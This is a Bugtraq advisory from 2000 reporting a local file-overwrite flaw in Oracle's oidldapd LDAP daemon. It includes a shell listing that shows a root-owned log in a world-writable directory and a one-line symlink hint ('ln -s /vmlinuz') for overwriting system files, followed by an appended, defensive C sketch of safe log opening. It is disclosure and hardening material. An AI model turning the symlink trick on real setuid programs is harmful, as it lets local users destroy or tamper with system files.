Bugtraq mailing list archives

vulnerability #2 in Oracle Internet Directory 2.1.1.1 in Oracle 8.1.7


From: Juan Manuel Pascual Escriba <pask () PLAZASITE COM>
Date: Fri, 22 Dec 2000 10:38:20 +0100

                      WWW.PLAZASITE.COM
                  System & Security Division

   Title:     Vulnerability in oidldapd in Oracle 8.1.7
    Date:     11-12-2000
Platform:     Only tested on Linux, but can be exported to others.
  Impact:     Any user can compromise any file on the local machine.
  Author:     Juan Manuel Pascual (pask () plazasite com)
  Status:     Vendor contacted, answers received. Details below.

OVERVIEW:
    oidldapd is the Oracle Internet Directory LDAP daemon. The
current version is 2.1.1.1.

PROBLEM SUMMARY:
    There is a write permission checking error in oidldapd that can be
used by local users to write any file on the local machine.

IMPACT:
    Any user with local access can write any file.

SOLUTION:
    Chmod -s ;-)))).

STATUS:
    Vendor was contacted.

----------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba            pask () plazasite com

--


                " In God We trust, Others We monitor "

        -------------------------------------------------------------
         Juan Manuel Pascual Escribá        Administrador de Sistemas
         PlazaSite S.A.                         c/ Tomás Bretón 32-38
         08950 Esplugues de Llobregat           (Barcelona),    SPAIN
         Ph: +34 93 3717398                       Fax: +34 93 3711968
         mob: 667591142                     Email: pask () plazasite com
        -------------------------------------------------------------

This feature seems to be new with oidldapd in OID 2.1.1.1/8.1.7; I couldn't
reproduce it with oidldapd in OID 2.0.6.3, and it seems to be very dangerous.
Look at this. On my system the following occurs:

my ORACLE_HOME=/work/oracle8ir3

oracle@dimoniet bin]$ cd /work/oracle8ir3/ldaplog
oracle@dimoniet log]$ ls -alc
total 12
drwxr-xrwx    2    oracle    orainstall    4096    Dec    12    05:03 .
drwxr-xrwx   13    oracle   orainstall    4096    Dec    10    18:50 ..

OK .. nothing in the logs ... let's execute oidldapd.

oracle@dimoniet log]$ /work/oracle8ir3/bin/oidldapd
oracle@dimoniet log]$ ls -alc
total 12
drwxr-xrwx    2    oracle   orainstall    4096    Dec    12    05:03 .
drwxr-xrwx   13   oracle   orainstall    4096    Dec    10    18:50 ..
-rw-r--r--    1    root     orainstall      86    Dec    12    05:26 oidldapd00.log


Oops ... owned by root? ... no comment on that .. what about ln -s /vmlinuz ./oidldapd00.log ? Or shared libraries?
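
Added example, not part of the original post and not Oracle's code: a Linux C sketch of the checks a privileged process needs before writing a log into a directory other users can write to, as the listing above shows for the log directory. It assumes oidldapd runs setuid root (inferred from the root-owned log and the "chmod -s" remedy); the function names, scratch directory and file names are hypothetical.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: open a log inside dirfd, refusing a pre-planted
 * symlink at `name`. Returns an fd, or -1 with errno set (Linux: ELOOP). */
int open_log_nofollow(int dirfd, const char *name)
{
    int fd = openat(dirfd, name,
                    O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW | O_CLOEXEC, 0640);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);              /* not a plain, singly linked regular file */
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed scenario: oidldapd00.log already exists as a symlink to a file
 * the daemon must not touch. Returns 0 when the symlink is refused, the
 * target stays empty, and a fresh log name still opens. */
int demo(void)
{
    char dir[] = "/tmp/ldaplogXXXXXX";
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    int dfd = open(dir, O_RDONLY | O_DIRECTORY);
    if (dfd < 0) return -1;
    close(openat(dfd, "protected_file", O_WRONLY | O_CREAT, 0600));
    if (symlinkat("protected_file", dfd, "oidldapd00.log") != 0) return -1;
    int bad = open_log_nofollow(dfd, "oidldapd00.log");
    int refused = (bad < 0 && errno == ELOOP);
    int good = open_log_nofollow(dfd, "oidldapd01.log");
    int untouched = (fstatat(dfd, "protected_file", &st, 0) == 0 && st.st_size == 0);
    if (good >= 0) close(good);
    unlinkat(dfd, "oidldapd00.log", 0);
    unlinkat(dfd, "oidldapd01.log", 0);
    unlinkat(dfd, "protected_file", 0);
    close(dfd);
    rmdir(dir);
    return (refused && good >= 0 && untouched) ? 0 : 1;
}
int main(void) { return demo(); }
```

These checks only narrow the window; removing the setuid bit, as the advisory's SOLUTION line says, or making the log directory writable only by its owner removes the condition itself.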

